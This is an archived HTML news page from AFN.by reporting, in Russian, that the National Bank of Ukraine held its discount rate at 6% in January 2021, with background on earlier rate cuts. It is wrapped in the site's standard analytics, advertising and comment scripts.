
<!DOCTYPE html>
<html>
<head><title>
	Нацбанк Украины сохранил учетную ставку на уровне 6% годовых | Украина Банки Ставка рефинансирования | АФН | Белорусские новости | Республика Беларусь | Минск
</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta property="og:image" content="/images/logo.gif" /><link rel="alternate" type="application/rss+xml" title="AFN.BY - Новости Беларуси" href="/news/rss/" /><link rel="icon" href="https://afn.by/favicon.ico" type="image/x-icon" />
    <link href="/styles/cocss.css?v=2020-09-16T2305" rel="stylesheet" type="text/css" />
    <!--[if lte IE 6]>
    <link href="/styles/ie6.css" rel="stylesheet" type="text/css" />
	<![endif]-->
	
	<meta name="keywords" content="Украина Банки Ставка рефинансирования Национальный банк Украины (НБУ) оставил учетную ставку на уровне 6% годовых, сообщил в четверг в ходе брифинга глава НБУ Кирилл Шевченко." /><meta name="description" content="Национальный банк Украины (НБУ) оставил учетную ставку на уровне 6% годовых, сообщил в четверг в ходе брифинга глава НБУ Кирилл Шевченко." /> 
	<link rel="stylesheet" type="text/css" href="/styles/cocss2.css" />
	

	<script>
	  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
	  ga('create', 'UA-261460-1', 'auto');
	  ga('send', 'pageview');
	</script>
	<script type="text/javascript">
	<!--//--><![CDATA[//><!--
	var pp_gemius_identifier = new String('chuaoc_Qf5oBaF0jf1u_J5PaDqti6EO9B3Q0cN4cczz.H7');
	var pp_gemius_hitcollector = 'gaby.hit.gemius.pl';
	//--><!]]>
	</script>
	<script type="text/javascript" src="/scripts/xgemius.js"></script>
	<script type='text/javascript'>
	(function() {
		var w = window,
		d = document,
		protocol =/https/i.test(w.location.protocol) ? 'https:' : 'http:',
		aml = typeof admixerML !== 'undefined' ? admixerML : { };
		aml.fn = aml.fn || [];
		aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
		aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
		if (!w.admixerML) {
			var lodash = document.createElement('script');
			lodash.id = 'amlScript';
			lodash.async = true;
			lodash.type = 'text/javascript';
			lodash.src = aml.cdnPath + 'scripts3/loader2.js';
			var node = d.getElementsByTagName('script')[0];
			node.parentNode.insertBefore(lodash, node);
			w.admixerML = aml;
		}
	})();
	</script>
	<script type='text/javascript'>
		admixerML.fn.push(function() {
                admixerML.defineSlot({z: '2febba63-69cc-42a7-8be2-e10bcbe63cd5', ph: 'admixer_2febba6369cc42a78be2e10bcbe63cd5_zone_16334_sect_4740_site_4170', i: 'inv-nets'});
                admixerML.defineSlot({z: 'a95e2ad3-94ac-4d52-9a1c-87227345965a', ph: 'admixer_a95e2ad394ac4d529a1c87227345965a_zone_16335_sect_4740_site_4170', i: 'inv-nets'});
                admixerML.singleRequest();
	});
	</script>
<script data-ad-client="ca-pub-5271363197717881" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!--giraffio start
<script type="text/javascript" src="//code.giraff.io/data/widget-afnby.js" async></script>
<!--giraffio end-->
<link href="/WebResource.axd?d=THc8N3S2QkNQqMfl-WTie7cxeKRizU7tc7N60RHbrcj44yBJsW2ah91bqt1hozGOVJ9Lzyy6wzJ7Z4fWBM68ZUFq0yxae3Ry3Yc6Qseymu-MWSkniP2-WFm9EjR0giB-Ss2ocLqAtGS3ptB3kqGNqw2&amp;t=633477618823728610" type="text/css" rel="stylesheet" /></head>
<script type="text/javascript">
	<!--
	var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="//www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})()
	//-->
</script>
<body>
    <!--div style="height:10px;"></div-->
    <form method="post" action="./285677?docid=285677&amp;doctype=news" id="form1">
<input type="hidden" name="C_C_SM_HiddenField" id="C_C_SM_HiddenField" value="" />
<input type="hidden" name="__VIEWSTATE_KEY" id="__VIEWSTATE_KEY" value="VIEWSTATE_107.23.218.4_637468706699706786" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="" />


<script type="text/javascript">
//<![CDATA[
var __cultureInfo = {"name":"ru-RU","numberFormat":{"CurrencyDecimalDigits":2,"CurrencyDecimalSeparator":",","IsReadOnly":true,"CurrencyGroupSizes":[3],"NumberGroupSizes":[3],"PercentGroupSizes":[3],"CurrencyGroupSeparator":" ","CurrencySymbol":"₽","NaNSymbol":"не число","CurrencyNegativePattern":8,"NumberNegativePattern":1,"PercentPositivePattern":1,"PercentNegativePattern":1,"NegativeInfinitySymbol":"-∞","NegativeSign":"-","NumberDecimalDigits":2,"NumberDecimalSeparator":",","NumberGroupSeparator":" ","CurrencyPositivePattern":3,"PositiveInfinitySymbol":"∞","PositiveSign":"+","PercentDecimalDigits":2,"PercentDecimalSeparator":",","PercentGroupSeparator":" ","PercentSymbol":"%","PerMilleSymbol":"‰","NativeDigits":["0","1","2","3","4","5","6","7","8","9"],"DigitSubstitution":1},"dateTimeFormat":{"AMDesignator":"","Calendar":{"MinSupportedDateTime":"\/Date(-62135596800000)\/","MaxSupportedDateTime":"\/Date(253402289999999)\/","AlgorithmType":1,"CalendarType":1,"Eras":[1],"TwoDigitYearMax":2029,"IsReadOnly":true},"DateSeparator":".","FirstDayOfWeek":1,"CalendarWeekRule":2,"FullDateTimePattern":"d MMMM yyyy \u0027г.\u0027 H:mm:ss","LongDatePattern":"d MMMM yyyy \u0027г.\u0027","LongTimePattern":"H:mm:ss","MonthDayPattern":"d MMMM","PMDesignator":"","RFC1123Pattern":"ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","ShortDatePattern":"dd.MM.yyyy","ShortTimePattern":"H:mm","SortableDateTimePattern":"yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","TimeSeparator":":","UniversalSortableDateTimePattern":"yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","YearMonthPattern":"MMMM yyyy","AbbreviatedDayNames":["Вс","Пн","Вт","Ср","Чт","Пт","Сб"],"ShortestDayNames":["Вс","Пн","Вт","Ср","Чт","Пт","Сб"],"DayNames":["воскресенье","понедельник","вторник","среда","четверг","пятница","суббота"],"AbbreviatedMonthNames":["янв","фев","мар","апр","май","июн","июл","авг","сен","окт","ноя","дек",""],"MonthNames":["Январь","Февраль","Март","Апрель","Май","Июнь","Июль","Август","Сентябрь","Октябрь","Ноябрь","Декабрь",""],"IsReadOnly":true,"NativeCalendarName":"григорианский календарь","AbbreviatedMonthGenitiveNames":["янв","фев","мар","апр","мая","июн","июл","авг","сен","окт","ноя","дек",""],"MonthGenitiveNames":["января","февраля","марта","апреля","мая","июня","июля","августа","сентября","октября","ноября","декабря",""]},"eras":[1,"наша эра",null,0]};//]]>
</script>

<script src="/ScriptResource.axd?d=akSou45Evp7QYCR6rCy7htnANdHwjDkxFyw36HKSo-8wMdXD9de7URVRMYA51QOIzoWdyxwX0sMjwWU2TzMx4l4Qae2TLQlFVihq1iCOjWSjxpMfsK79SS6cB6nWo__eoZfe-4JwvmEnb7dZSD-vXPY4VBsSz_iUFM1z9dz-vw41&amp;t=4f7d5f1" type="text/javascript"></script>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEdADivVXD1oYELeveMr0vHCmYPkG2HrQgzr0uqfg/vgARy8krhqKne9lIdv6181GWiPfLUHYKvobnG12o5DY7oY83/mXT36d4DkwYu27EhZ/6idainZEhDHLE0iNkmFenyuATAOCmFu+fxRSjC8oHVaWTMaGtsjx+KpVR4WaU0CfdF0NhhebCjYzXFd2PJwAeSO7ar6+aAG0KYz0+Zo9nGR3zSoHcvmR8m2ihSGQX7pqMBn0SvKqbJhTjTqX+is8hcalyKpYHV1TcPgbpzOWJR3mg1lNayxelPSWfIVttxv+cxVpe3xkid7fIBvAEvZXwckQ+nZw/5ocuGVXD2SBcaghg7iYh+rvhWBRgtWQl1NLs8FIVmit+yDRZT8LoXD2T05Ws46MEHxDXmemWNi2VIwDkoP8cdhTWCv6mZ9dqeIf7uODckEil2aZ0PwTKPxxGS7V7MVv0Cs85qygDpQ148680kE3TrGbj8aSTuvI8or7uq78V2fWOLkHa5+K2Yo+0ak/eA1fz1pLSLF3YdxUWJgXfvclGSN1BSVGShlkXapEU5GqfrYmtGJH9kaNDDSZN3naxNFFcvwCJXvEcNGdwE59V93gGHgiWcgz9GAQd2ceosxNu2dj/wfQMBN/FCReIYD+Nu9L4BEz6DwIM/MqbQWm2OwrNCPJwebDgD3hKOS+mabO9DIZ9kaU0zegSMJ439Mex9r6k9X1Rk+cQpr9BaFA2MWmW83wwSFmlsu9We1DcFOsEZDmo6SOoxuaxnK/2GWbrM0FpbdDn7ePLymbzycpuINTyaiRDPp2GJgAD7Rfl1rlwB6/aIJDvClebW2+DsToAJhgPda2dG/rrgB+gIaWpTMV35aFtTC7oJ8jzQYs5EjhIhQWcZwPx44NIdfZKMAGjOHicsklQoAx78Sa8WxdfwY1u/Ae1ys/Yyyw+PhtW05pWIEIDNYWIWwrM/+2Hfs0YJF2qRlC3H1VUnZNLSaHw/Y7Mik7iqcZwmCReCOY2347SpenbnqJSb0rPew7qWjyK5ScltXHa/ZoR3SgNK8k0YHuu+878oqInuePLtJeBqBq9dgdOicjkVDuOF2ZD7HnLjdzn53mgeQQ7cbdasf2JSAjDGaCefPxyOPiFk5OqyJ9dHlwNxrZ3ltB5RsUqm9l5DExjax/yBa+n79TUU1d9Mn1Gt1pTwoWLY86u3TKM80jugJjOarMzrWnQuiSlOkw/D9DF3j+n1fhAoZacE7L28" />
		
		<div style="margin: 10px auto 20px;">
			<div id='admixer_2febba6369cc42a78be2e10bcbe63cd5_zone_16334_sect_4740_site_4170'></div>
		</div>
		<script type='text/javascript'>
		admixerML.fn.push(function() { admixerML.display('admixer_2febba6369cc42a78be2e10bcbe63cd5_zone_16334_sect_4740_site_4170'); });
		</script>
		<div id="hd">
			<div id="logo">
				<a href="../../"><img src="/images/logo.gif" alt="АФН - Белорусское информационное агенство" width="120" height="60" border="0" /></a>
			</div>
			<div class="c">
				<ul id="toolbar">
					<li class="first"><a href="../../">Главная</a>&nbsp;&nbsp;</li><li><a href="../../news">Новости</a></li><li><a href="../../finances">Финансы</a></li><li><a href="../../oil">Нефть</a></li>
				</ul>
				<ul id="additional_toolbar">
					<li><a href="/sitemap">Карта сайта</a></li>
				</ul>
				<br />
				
				<div class="info">Последнее обновление: 21.01.2021 19:19</div>
				
			</div>
			
		</div>
        	
	<div id="container">
		<div id="content">
			<div class="wrapper">
				<!--:/news/i/285677:-->
<div class="banner-placeholder">
<!-- Yandex.RTB R-A-465488-1 -->
<div id="yandex_rtb_R-A-465488-1"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-465488-1",
                renderTo: "yandex_rtb_R-A-465488-1",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>
</div>

				
	
    
<div id="d285677" class="doc">
    <div class="hd">
        
        <h1>Нацбанк Украины сохранил учетную ставку на уровне 6% годовых</h1>
        
	<div style="float:left;font-size:1em;margin-right: 20px;">
        <div><span><a href="../2021/01/21">21.01.2021 18:20</a></span>&nbsp;|&nbsp;<span><a href="http://afn.by" rel="nofollow" target="_blank">АФН</a></span></div>
        
        <div>Категории: <a href="../category/1,10">Украина</a> <a href="../category/2,28">Банки</a> <a href="../category/3,206">Ставка рефинансирования</a></div>
	    
	</div>
	<div id="fb-root" style="margin-top:10px;"></div><script src="//connect.facebook.net/en_US/all.js#appId=177634385630657&amp;xfbml=1"></script><fb:like href="" send="true" layout="button_count" width="250" show_faces="true" font="trebuchet ms"></fb:like>
    </div>
    <div class="bd">
    <p>Национальный банк Украины (НБУ) оставил учетную ставку на уровне 6% годовых, сообщил в четверг в ходе брифинга глава НБУ Кирилл Шевченко.</p><p>«Правление Национального банка приняло решение оставить учетную ставку без изменений - на уровне 6% годовых», - сказал он на брифинге.</p><p>В декабре прошлого года Шевченко заявил, что Национальный банк планирует проводить мягкую монетарную политику, однако будет готов отреагировать повышением учетной ставки на ускорение инфляции в условиях оживления мировой и украинской экономики. Как он тогда отметил, в ноябре потребительские цены выросли на 3,8% в годовом измерении. В месячном исчислении рост индекса был также ощутимым и составил 1,3%, указал глава НБУ.</p><p>Нацбанк Украины начал постепенно снижать учетную ставку с апреля 2019 года, тогда она составляла 18% годовых. В апреле 2020 года регулятор снизил ее до 8%, а в июне до 6%, передает ТАСС.</p><p>Учетная ставка является одним из монетарных инструментов, с помощью которого НБУ устанавливает для банков и других субъектов денежно-кредитного рынка ориентир по стоимости привлеченных и размещенных денежных средств. Снижение учетной ставки, как правило, приводит к удешевлению кредитов банков.</p><p></p>
    </div>
    <div class="ft"></div>
</div>
    <div class="clear" style="width:99%;">
		
		<div class="clear"></div>
		
<div class="l">

	<div class="hd">
		Ранее по теме
	</div>

			<ul class="bd">
				
			<li class="i">
				<a href="/news/i/282602">
				<span class="time">22.10 16:29</span> <span class="title">Нацбанк Украины оставил учетную ставку на уровне 6% годовых</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/279371">
				<span class="time">03.08 16:27</span> <span class="title">Нацбанк Украины не исключает повышения ключевой ставки в 2021 году</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/276805">
				<span class="time">11.06 15:50</span> <span class="title">Нацбанк Украины снизил ключевую ставку до исторического минимума 6,0%</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/275364">
				<span class="time">23.04 15:07</span> <span class="title">Нацбанк Украины снизил ставку до 8%, сильнее ожиданий</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/274104">
				<span class="time">12.03 18:02</span> <span class="title">Нацбанк Украины снизил ставку до 10% для поддержки экономики</span>
				</a>
			</li>
		
			</ul>
		
</div>

    </div>
	<div class="clear"></div>
<br><br>
<!--LuckyAds-->
<div data-la-block="4e3e7c89-f061-45c3-9ca4-e90e26604ad9"></div>
<!-- Composite Start 
<div id="M617914ScriptRootC973088"></div>
<script src="https://jsc.lentainform.com/a/f/afn.by.973088.js" async></script>
<!-- Composite End -->

<!--giraff-->
<!--<div id="grf_afnby_2"></div>--->
<!--<div id="M242oY8Bs7fkyrP7JVbL" data-type="2" class="blockOfO1b2l3"></div>-->

    
<div class="clear"></div>
<div id="disqus_thread"></div>
<script type="text/javascript">
    /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
    var disqus_shortname = 'afnby'; // required: replace example with your forum shortname

    // The following are highly recommended additional parameters. Remove the slashes in front to use.
    // var disqus_identifier = 'unique_dynamic_id_1234';
    // var disqus_url = 'http://example.com/permalink-to-page.html';

    var disqus_identifier = 'afnby_news_285677';

    /* * * DON'T EDIT BELOW THIS LINE * * */
    (function() {
        var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
        dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>
<noindex>
<a href="//disqus.com" class="dsq-brlink" rel="nofollow">blog comments powered by <span class="logo-disqus">Disqus</span></a>
</noindex>

<!--

<div id="comments">
    <div class="hd" style="display:none">
		<h4>Комментарии</h4>
    	
	</div>
    
</div>


-->
<!--
<span id="C_C_Co_CommentsClosedLabel" class="commentsClosed">Комментарии запрещены</span>
-->
    
    
				<div class="adv clear">
					<!--2657565487752-->
				</div>
			</div>
		</div>
		<div id="info">			
			
	<div id="C_I_Ca" class="calendar"><div class="c"><table id="C_I_PC" cellspacing="0" cellpadding="2" title="Calendar">
	<tr><td colspan="7" bgcolor="Silver"><table cellspacing="0" width="100%">
		<tr><td width="15%"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$PC','V7610')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" width="70%">Декабрь 2020</td><td align="right" width="15%"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$PC','V7671')" style="color:Black" title="Go to the next month"></a></td></tr>
	</table></td></tr><tr><th align="center" abbr="понедельник" scope="col">Пн</th><th align="center" abbr="вторник" scope="col">Вт</th><th align="center" abbr="среда" scope="col">Ср</th><th align="center" abbr="четверг" scope="col">Чт</th><th align="center" abbr="пятница" scope="col">Пт</th><th align="center" abbr="суббота" scope="col">Сб</th><th align="center" abbr="воскресенье" scope="col">Вс</th></tr><tr><td align="center" width="14%">30</td><td align="center" width="14%"><a href="/news/2020/12/01">1</a></td><td align="center" width="14%"><a href="/news/2020/12/02">2</a></td><td align="center" width="14%"><a href="/news/2020/12/03">3</a></td><td align="center" width="14%"><a href="/news/2020/12/04">4</a></td><td align="center" width="14%"><a href="/news/2020/12/05">5</a></td><td align="center" width="14%"><a href="/news/2020/12/06">6</a></td></tr><tr><td align="center" width="14%"><a href="/news/2020/12/07">7</a></td><td align="center" width="14%"><a href="/news/2020/12/08">8</a></td><td align="center" width="14%"><a href="/news/2020/12/09">9</a></td><td align="center" width="14%"><a href="/news/2020/12/10">10</a></td><td align="center" width="14%"><a href="/news/2020/12/11">11</a></td><td align="center" width="14%"><a href="/news/2020/12/12">12</a></td><td align="center" width="14%"><a href="/news/2020/12/13">13</a></td></tr><tr><td align="center" width="14%"><a href="/news/2020/12/14">14</a></td><td align="center" width="14%"><a href="/news/2020/12/15">15</a></td><td align="center" width="14%"><a href="/news/2020/12/16">16</a></td><td align="center" width="14%"><a href="/news/2020/12/17">17</a></td><td align="center" width="14%"><a href="/news/2020/12/18">18</a></td><td align="center" width="14%"><a href="/news/2020/12/19">19</a></td><td align="center" width="14%"><a href="/news/2020/12/20">20</a></td></tr><tr><td align="center" width="14%"><a href="/news/2020/12/21">21</a></td><td align="center" width="14%"><a href="/news/2020/12/22">22</a></td><td align="center" width="14%"><a href="/news/2020/12/23">23</a></td><td align="center" width="14%"><a href="/news/2020/12/24">24</a></td><td align="center" width="14%"><a href="/news/2020/12/25">25</a></td><td align="center" width="14%"><a href="/news/2020/12/26">26</a></td><td align="center" width="14%"><a href="/news/2020/12/27">27</a></td></tr><tr><td align="center" width="14%"><a href="/news/2020/12/28">28</a></td><td align="center" width="14%"><a href="/news/2020/12/29">29</a></td><td align="center" width="14%"><a href="/news/2020/12/30">30</a></td><td align="center" width="14%"><a href="/news/2020/12/31">31</a></td><td align="center" width="14%">1</td><td align="center" width="14%">2</td><td align="center" width="14%">3</td></tr><tr><td align="center" width="14%">4</td><td align="center" width="14%">5</td><td align="center" width="14%">6</td><td align="center" width="14%">7</td><td align="center" width="14%">8</td><td align="center" width="14%">9</td><td align="center" width="14%">10</td></tr>
</table></div><div class="c"><table id="C_I_C" cellspacing="0" cellpadding="2" title="Calendar">
	<tr><td colspan="7" bgcolor="Silver"><table cellspacing="0" width="100%">
		<tr><td width="15%"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$C','V7640')" style="color:Black" title="Go to the previous month"></a></td><td align="center" width="70%">Январь 2021</td><td align="right" width="15%"><a href="javascript:__doPostBack('ctl00$ctl00$C$I$C','V7702')" style="color:Black" title="Go to the next month"></a></td></tr>
	</table></td></tr><tr><th align="center" abbr="понедельник" scope="col">Пн</th><th align="center" abbr="вторник" scope="col">Вт</th><th align="center" abbr="среда" scope="col">Ср</th><th align="center" abbr="четверг" scope="col">Чт</th><th align="center" abbr="пятница" scope="col">Пт</th><th align="center" abbr="суббота" scope="col">Сб</th><th align="center" abbr="воскресенье" scope="col">Вс</th></tr><tr><td align="center" width="14%">28</td><td align="center" width="14%">29</td><td align="center" width="14%">30</td><td align="center" width="14%">31</td><td align="center" width="14%">1</td><td align="center" width="14%"><a href="/news/2021/01/02">2</a></td><td align="center" width="14%"><a href="/news/2021/01/03">3</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/01/04">4</a></td><td align="center" width="14%"><a href="/news/2021/01/05">5</a></td><td align="center" width="14%"><a href="/news/2021/01/06">6</a></td><td align="center" width="14%"><a href="/news/2021/01/07">7</a></td><td align="center" width="14%"><a href="/news/2021/01/08">8</a></td><td align="center" width="14%"><a href="/news/2021/01/09">9</a></td><td align="center" width="14%"><a href="/news/2021/01/10">10</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/01/11">11</a></td><td align="center" width="14%"><a href="/news/2021/01/12">12</a></td><td align="center" width="14%"><a href="/news/2021/01/13">13</a></td><td align="center" width="14%"><a href="/news/2021/01/14">14</a></td><td align="center" width="14%"><a href="/news/2021/01/15">15</a></td><td align="center" width="14%"><a href="/news/2021/01/16">16</a></td><td align="center" width="14%"><a href="/news/2021/01/17">17</a></td></tr><tr><td align="center" width="14%"><a href="/news/2021/01/18">18</a></td><td align="center" width="14%"><a href="/news/2021/01/19">19</a></td><td align="center" width="14%"><a href="/news/2021/01/20">20</a></td><td align="center" bgcolor="Silver" width="14%"><font color="White"><a href="/news/2021/01/21">21</a></font></td><td align="center" width="14%">22</td><td class="future" align="center" width="14%">23</td><td class="future" align="center" width="14%">24</td></tr><tr><td class="future" align="center" width="14%">25</td><td class="future" align="center" width="14%">26</td><td class="future" align="center" width="14%">27</td><td class="future" align="center" width="14%">28</td><td class="future" align="center" width="14%">29</td><td class="future" align="center" width="14%">30</td><td class="future" align="center" width="14%">31</td></tr><tr><td class="future" align="center" width="14%">1</td><td class="future" align="center" width="14%">2</td><td class="future" align="center" width="14%">3</td><td class="future" align="center" width="14%">4</td><td class="future" align="center" width="14%">5</td><td class="future" align="center" width="14%">6</td><td class="future" align="center" width="14%">7</td></tr>
</table></div></div>
	<div class="clear"></div>
	
<div class="l">

	<div class="hd">
		Экономика
	</div>

			<ul class="bd">
				
			<li class="i">
				<a href="/news/i/285678">
				<span class="time">21.01 18:24</span> <span class="title">ЕЦБ сохранил базовую процентную ставку по кредитам на нулевом уровне</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285674">
				<span class="time">21.01 15:22</span> <span class="title">Нацбанк Беларуси предоставил банкам ликвидность в объеме 426,8 млн. рублей</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285671">
				<span class="time">21.01 13:50</span> <span class="title">Россия предлагает ужесточить беспошлинный ввоз товаров при повторном въезде в ЕАЭС</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285670">
				<span class="time">21.01 13:05</span> <span class="title">Белорусский рубль укрепился к доллару на торгах БВФБ 21 января 2021 г.</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285668">
				<span class="time">21.01 12:34</span> <span class="title">Лукашенко требует жесточайшего наказания за зарплату в конвертах</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285667">
				<span class="time">21.01 12:27</span> <span class="title">ДФР нагрянул с проверкой в «Офис по правам людей с инвалидностью»</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285666">
				<span class="time">21.01 12:18</span> <span class="title">Генпрокуратура РБ направила в суд дело Виктора Бабарико</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285665">
				<span class="time">21.01 11:10</span> <span class="title">Беларуськалий готов принять на работу уволенных из-за стачки шахтеров</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285664">
				<span class="time">21.01 10:22</span> <span class="title">Белорусский рубль укрепился ко всем валютам на открытии торгов на БВФБ</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285659">
				<span class="time">21.01 09:20</span> <span class="title">SpaceX осуществила 17-й запуск ракеты-носителя со спутниками Starlink</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285657">
				<span class="time">21.01 08:57</span> <span class="title">«Газпром» разместил еврооблигации на $2 млрд</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285654">
				<span class="time">21.01 08:46</span> <span class="title">Стачком Беларуськалия просит норвежскую Yara разорвать контракт</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285649">
				<span class="time">20.01 17:23</span> <span class="title">Бывшего замдиректора Скидельского сахарного комбината осудили на 5 лет колонии</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285645">
				<span class="time">20.01 15:05</span> <span class="title">МАЗ выпал из top-5 поставщиков грузовиков на российский рынок</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285644">
				<span class="time">20.01 13:32</span> <span class="title">Нацбанк РБ на неделю отодвинул решение по ставке рефинансирования</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285643">
				<span class="time">20.01 13:07</span> <span class="title">Белорусский рубль укрепился к доллару на торгах БВФБ 20 января 2021 г.</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285635">
				<span class="time">20.01 10:22</span> <span class="title">Белорусский рубль продолжил укрепляться к доллару на открытии торгов на БВФБ</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285633">
				<span class="time">20.01 09:13</span> <span class="title">Правительство Испании объявило Мадрид "зоной катастрофы"</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285632">
				<span class="time">20.01 09:09</span> <span class="title">ЕС объявил о намерении усилить роль евро как резервной валюты по отношению к доллару</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285630">
				<span class="time">20.01 09:03</span> <span class="title">Власти России хотят повысить утильсбор на автомобили на 25%</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285628">
				<span class="time">20.01 08:54</span> <span class="title">В Беларуси расширен перечень социально значимых товаров с регулируемыми ценами</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285620">
				<span class="time">19.01 17:29</span> <span class="title">Литва из-за ремонта отключила две ЛЭП с Беларусью</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285618">
				<span class="time">19.01 16:47</span> <span class="title">Верховный суд отказал в жалобе стачкому «Беларуськалия»</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285617">
				<span class="time">19.01 16:43</span> <span class="title">ЕС отменит запрет на эксплуатацию самолетов Boeing 737 Max</span>
				</a>
			</li>
		
			<li class="i">
				<a href="/news/i/285614">
				<span class="time">19.01 14:50</span> <span class="title">Турция запретила рекламу в Twitter, Periscope и Pinterest</span>
				</a>
			</li>
		
			</ul>
		
</div>

	<!--False-->

			<div class="adv clear">
<!-- Yandex.RTB R-A-465488-2 -->
<div id="yandex_rtb_R-A-465488-2"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-465488-2",
                renderTo: "yandex_rtb_R-A-465488-2",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>
<!-- sidebar start -->
<!--<div id="grf_afnby"></div>-->
<!-- sidebar end -->

</div>

		<!--	-->
</div>
		<div id="nav">
			<div>
				<br />
				<ul id="menu">
					<li><a href="../top">Главное</a></li>
					
							
							<li><a href="../politics">Политика</a></li>
						
							<li><a href="../economy">Экономика</a></li>
						
							<li><a href="../energy">Энергетика</a></li>
						
							<li><a href="../social">Общество</a></li>
						
						
				</ul>
			</div>
			
			
			<div class="redBtn">
				<a href="/news/i/279946">afn.by заблокирован Мининформом<br><br>Помоги сайту</a>
			</div>
			
		</div>
	</div>

		<div id="ft">
			<div class="c">
				&copy; 1995-2019 УП "Ньюс-Релиз"<br />
				<a href="../../contacts">Контактная информация</a> | <a href="../../copyrights">Права на использование</a>
			</div>
			<div class="clear">
			</div>
			
	

		</div>
    </form>
<!-- Yandex.Metrika counter -->
<script type="text/javascript" >
   (function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};
   m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
   (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

   ym(421539, "init", {
        clickmap:true,
        trackLinks:true,
        accurateTrackBounce:true,
        trackHash:true
   });
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/421539" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
<!-- Sape counter -->
<script type="text/javascript">
var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="//www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})()
</script>
<!-- Sape counter -->

<script>window.RESOURCE_O1B2L3 = 'sdfgdgf.info';</script>
<script src="//sdfgdgf.info/ux/CHxq.js" ></script>


<script async src="//dwbogv.com/8snl17291ivlm0p3y0hq8786uqv678kypxu1lk8.php"></script>

</body>
</html>
